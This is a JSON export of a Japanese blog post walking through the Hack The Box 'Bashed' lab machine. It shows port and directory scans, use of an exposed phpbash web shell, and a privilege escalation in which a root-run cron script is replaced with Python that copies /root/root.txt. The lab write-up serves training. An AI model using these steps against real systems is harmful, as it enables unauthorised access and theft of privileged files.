{"id":3717,"date":"2020-08-08T16:33:19","date_gmt":"2020-08-08T07:33:19","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3717"},"modified":"2020-08-30T23:34:41","modified_gmt":"2020-08-30T14:34:41","slug":"hack-the-box-bashed-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3717","title":{"rendered":"Hack The Box &#8211; Bashed &#8211; Walkthrough"},"content":{"rendered":"<h3>Arrexel&#8217;s Development Site\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 bashed.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 05:31 UTC\r\nNmap scan report for bashed.htb (10.10.10.68)\r\nHost is up (0.043s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: Arrexel's Development Site\r\n<\/pre>\n<h3>gobuster\u3067\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3084\u30d5\u30a1\u30a4\u30eb\u3092\u8abf\u67fb\u3059\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# gobuster dir -u http:\/\/bashed.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n&#x5B;+] Url:            http:\/\/bashed.htb\r\n&#x5B;+] Threads:        10\r\n&#x5B;+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n&#x5B;+] Status codes:   200,204,301,302,307,401,403\r\n&#x5B;+] User Agent:     gobuster\/3.0.1\r\n&#x5B;+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/08 05:41:13 Starting gobuster\r\n===============================================================\r\n\/images (Status: 301)\r\n\/uploads (Status: 301)\r\n\/php (Status: 301)\r\n\/css (Status: 301)\r\n\/dev (Status: 301)\r\n\/js (Status: 301)\r\n\/fonts (Status: 301)\r\n<\/pre>\n<h3>phpbash.php\u3092\u898b\u3064\u3051\u3066\u3001user.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n<p>\u4ee5\u4e0b\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u30b7\u30a7\u30eb\u3092\u5b9f\u884c\u3067\u304d\u3066\u3001user.txt\u304c\u53d6\u5f97\u3067\u304d\u305f\u3002<br \/>\nhttp:\/\/bashed.htb\/dev\/phpbash.php<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-300x134.png\" alt=\"\" width=\"300\" height=\"134\" class=\"alignnone size-medium wp-image-3718\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-300x134.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-1024x459.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-768x344.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353.png 1085w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>\u30b7\u30a7\u30eb\u5185\u3092\u8abf\u67fb\u3057\u3066\u3001\/scrpits\/test.py\u304c\u6bce\u5206\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-300x101.png\" alt=\"\" width=\"300\" height=\"101\" class=\"alignnone size-medium wp-image-3719\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-300x101.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-1024x346.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-768x259.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-1536x518.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955.png 2021w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>test.py\u3092\u66f8\u304d\u63db\u3048\u308b\u3053\u3068\u3067\u3001root.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n<p>Kali Linux\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u3092\u9001\u308b\u6e96\u5099\u3092\u3059\u308b\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# cat test.py\r\nimport os\r\nos.system(&quot;cat \/root\/root.txt &gt; \/tmp\/root.txt&quot;)\r\n# python -m SimpleHTTPServer 1234\r\nServing HTTP on 0.0.0.0 port 1234 ...\r\n<\/pre>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-300x146.png\" alt=\"\" width=\"300\" height=\"146\" class=\"alignnone size-medium wp-image-3720\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-300x146.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-1024x499.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-768x374.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-1536x749.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124.png 1731w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Arrexel&#8217;s Development Site\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b # nmap -A -n -F -T5 bashed.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3717"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717\/revisions"}],"predecessor-version":[{"id":3789,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717\/revisions\/3789"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}